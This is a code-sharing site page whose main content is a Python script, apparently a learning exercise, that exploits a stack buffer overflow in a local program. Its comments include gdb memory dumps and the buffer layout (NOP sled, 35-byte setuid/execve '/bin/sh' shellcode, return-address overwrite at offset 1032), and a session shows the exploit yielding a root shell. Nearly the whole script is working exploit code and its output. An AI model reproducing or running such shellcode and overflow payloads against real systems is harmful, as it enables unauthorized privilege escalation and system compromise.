The Code-Bin
Links
Home
Add your code!
All Listings
About
Latest Entry
Featured Scripts
Author's Website
Latest Entries
FFMPEG Thumbnail Scr...
PHP, 0.8KB
Jul. 29, 10:24pm
John
Z80 Assembler, 190 bytes
Feb. 17, 3:36am
John
Z80 Assembler, 176 bytes
Sep. 13, 2:19am
John
Z80 Assembler, 77 bytes
Sep. 13, 2:18am
John
Z80 Assembler, 209 bytes
Sep. 13, 2:17am
untitled Python Code
Posted by: huhu | September 13, 2009 @ 9:18pm
Python Code
[
Download
]
#!/usr/bin/env python """ Ok so it seems i made a mistake in my original notes. sorry ;> tip) check the stack to make sure your shellcode is not being corrupted. ex: (gdb) x/10x $esp - 47 0xbffff591: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff5a1: 0x90909090 0x90909090 0xdb31c031 0xd231c931 0xbffff5b1: 0x80cd46b0 0x2f2f6851 (gdb) 0xbffff5b9: 0x2f686873 0x006e6962 0x2f000000 0x2f6e6962 0xbffff5c9: 0x0068732f 0x00000000 0xf0bffff7 0x48bffff5 0xbffff5d9: 0x75bffff6 0x70b7e8a7 (gdb) quit we see our shellcode starting at 0xbffff5a1 going through the addresses we see it gets corrupted for some reason at 0xbffff5b9 null bytes -> fail. Solution: Eip resides at buffer = 1032 exactly so your buffer has to be 1028bytes not 1032. since you use those extra 4 bytes as the eip address.. anyway for this bug i just split the buffer up like so NOPS -> 428 bytes SHELLCODE -> 35 bytes NOPS -> 565 bytes RET -> 4 bytes >>> 428 + 35 + 565 +4 1032 (gdb) x/10x $esp -625 0xbffff35f: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff36f: 0x90909090 0x31c03190 0x31c931db 0xcd46b0d2 0xbffff37f: 0x2f685180 0x6868732f (gdb) quit as you can see our shellcode is not corrupted this time as it was last time :D --- root@user-laptop:/home/user# nano bleh.py root@user-laptop:/home/user# python bleh.py # id uid=0(root) gid=0(root) groups=0(root) # exit """ import os import struct #shellcode len is 35 shellcode = ( "\x31\xc0\x31\xdb\x31\xc9" "\x31\xd2\xb0\x46\xcd\x80" "\x51\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89" "\xe3\x51\x53\x89\xe1\x31" "\xc0\xb0\x0b\xcd\x80") #EIP OVERWRITE IS AT 1032 lols = "\x90"*428 lols += shellcode lols += "\x90"*565 lols += struct.pack('<L',0xbffff35f) print os.system("./hu %s"%lols)
Syntax Highlighting
[
Open in new window
]
Author Comments
none
Rating
4.49 / 8
65 Votes
http://codebin.yi.org/379
page generated in 0.01 seconds